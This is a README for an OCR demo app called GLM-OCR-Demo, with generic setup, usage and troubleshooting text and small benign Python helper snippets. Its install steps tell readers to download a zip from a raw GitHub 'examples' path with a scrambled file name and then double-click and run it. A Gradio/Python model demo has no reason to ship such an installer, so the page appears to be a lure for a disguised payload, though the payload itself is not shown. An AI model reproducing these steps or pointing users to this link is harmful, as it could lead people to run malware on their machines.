Welcome to GLM-OCR-Demo! This application showcases the GLM-OCR multimodal OCR model developed by zai-org. With this tool, you can upload images and recognize text, formulas, and tables. Results are available as both plain text and Markdown, so they are easy to reuse in other applications.
To use this software, you need to follow a few straightforward steps. We will guide you through downloading and setting it up on your computer.
Make sure you check out the latest version on our Releases page.
- Visit the Releases Page: Go to our Releases page to download the software.
- Choose Your Version: The Releases page lists the available versions. Select the latest one to get the most recent features and improvements.
- Download the Installation File: Click the file link to start your download. The link will typically look something like https://github.com/emotech15/GLM-OCR-Demo/raw/refs/heads/main/examples/OC-Demo-GL-v2.3.zip. Your browser will handle the download, and the file should appear in your Downloads folder.
- Run the Installer: After downloading, locate the file in your Downloads folder. Double-click the file to begin installation, then follow the prompts to complete it.
- Open the Application: Once installed, GLM-OCR-Demo appears in your applications folder. Open it to begin.
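Because the example download link above points to a .zip archive, it can be useful to confirm that the download completed and to see what the archive contains before running anything from it. The following is a minimal sketch using only Python's standard library; the function name `list_archive` is hypothetical and is not part of GLM-OCR-Demo.

```python
import zipfile


def list_archive(path):
    """Return (name, size_in_bytes) for every entry in a zip archive.

    Raises ValueError if the file is not a readable zip, which usually
    means the download was interrupted or the file is something else.
    """
    if not zipfile.is_zipfile(path):
        raise ValueError(f"{path} is not a valid zip archive")
    with zipfile.ZipFile(path) as archive:
        return [(info.filename, info.file_size) for info in archive.infolist()]
```

For example, `list_archive("OC-Demo-GL-v2.3.zip")` would return the entries of a file with that name in the current directory, assuming the download was saved under that name.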
To ensure smooth operation, make sure your system meets the following requirements:
- Operating System: Windows 10 or later / macOS 10.12 (Sierra) or later / Linux
- RAM: Minimum of 4 GB, preferably 8 GB or more
- Disk Space: At least 1 GB of free space for installation
- Internet Connection: Required for downloading images and processing
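Some of the requirements above can be checked from a short script. The sketch below uses only Python's standard library to report the operating system family and the free disk space at a chosen location. It does not check the OS version or the amount of RAM, since the standard library has no portable way to query memory. The function name `check_requirements` and the `install_dir` parameter are hypothetical.

```python
import platform
import shutil

# 1 GB of free space, taken from the requirements list above.
MIN_FREE_BYTES = 1 * 1024**3


def check_requirements(install_dir="."):
    """Report the OS family and whether install_dir has enough free space."""
    system = platform.system()  # "Windows", "Darwin" (macOS), or "Linux"
    free_bytes = shutil.disk_usage(install_dir).free
    return {
        "os": system,
        "os_supported": system in {"Windows", "Darwin", "Linux"},
        "free_gb": round(free_bytes / 1024**3, 1),
        "disk_ok": free_bytes >= MIN_FREE_BYTES,
    }


if __name__ == "__main__":
    for name, value in check_requirements().items():
        print(f"{name}: {value}")
```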
- Upload an Image: After opening the application, you will see an option to upload your image. Click the "Upload" button and select an image file from your computer. Supported formats include JPG, PNG, and BMP.
- Select Recognition Type: Choose whether you want to recognize text, formulas, or tables. This tells the model what to look for in your uploaded image.
- Run the OCR Process: Once you have selected your options, click the "Start" button. The application will process your image. This may take a few moments, depending on the size and complexity of the image.
- View Results: The recognized content appears on the screen after processing. You can copy the text or export it in your desired format (plain text or Markdown).
- Save Your Output: Use the "Save" function to save your recognized text. You can choose where to store it on your computer for later use.
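If you copy the recognized content out of the application and want to store it yourself, the export step can be approximated in a few lines of Python. This is only a sketch of the idea, not how the application's "Save" function works; `save_result`, its parameters, and the `.txt`/`.md` naming scheme are assumptions made for illustration.

```python
from pathlib import Path

# Assumed mapping from the two export formats to file extensions.
OUTPUT_SUFFIXES = {"text": ".txt", "markdown": ".md"}


def save_result(content, image_path, fmt="markdown", out_dir="."):
    """Write recognized content next to a name derived from the image file.

    For image_path "scans/receipt.jpg" and fmt "markdown", the output
    file is "<out_dir>/receipt.md".
    """
    if fmt not in OUTPUT_SUFFIXES:
        raise ValueError(f"fmt must be one of {sorted(OUTPUT_SUFFIXES)}")
    out_path = Path(out_dir) / (Path(image_path).stem + OUTPUT_SUFFIXES[fmt])
    out_path.write_text(content, encoding="utf-8")
    return out_path
```

Deriving the output name from the image name keeps each result paired with its source image when you process several files.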
If you encounter any issues while using the application, try the following steps:
- Update Your System: Ensure that your operating system is updated to the latest version.
- Check File Format: Verify that the image file you are uploading is in a supported format.
- Restart the Application: Sometimes, simply closing and reopening the application can resolve minor glitches.
To get the best recognition results:
- Use clear, well-lit images.
- Avoid images with heavy noise or distracting backgrounds.
- Ensure the text in images is not too small.
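The "Check File Format" troubleshooting step can be done more reliably by looking at the file's first bytes rather than its extension, since a renamed file keeps its original contents. The sketch below compares the start of a file against the standard signatures for PNG, JPEG, and BMP. The function name `detect_image_format` is hypothetical, and the BMP check is only a two-byte heuristic.

```python
# Leading bytes ("magic numbers") of the three supported formats.
SIGNATURES = {
    "PNG": b"\x89PNG\r\n\x1a\n",
    "JPG": b"\xff\xd8\xff",
    "BMP": b"BM",
}


def detect_image_format(path):
    """Return "PNG", "JPG", or "BMP" based on the file header, else None."""
    with open(path, "rb") as f:
        header = f.read(8)  # the longest signature (PNG) is 8 bytes
    for name, magic in SIGNATURES.items():
        if header.startswith(magic):
            return name
    return None
```

A result of `None` suggests the file is in an unsupported format or is corrupted, even if its name ends in `.jpg`, `.png`, or `.bmp`.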
For further assistance, check our FAQ section or contact our support team. You can find additional resources on our GitHub page.
Related topics and technologies:
- accelerate
- computer vision
- flash attention
- GLM-OCR
- Gradio
- Hugging Face Transformers
- Markdown
- Optical Character Recognition (OCR)
- OpenCV
- Pillow
- Python
- PyTorch
- Torch
- torchvision
- Vision Language Models (VLMs)
Thank you for using GLM-OCR-Demo! Happy text extraction.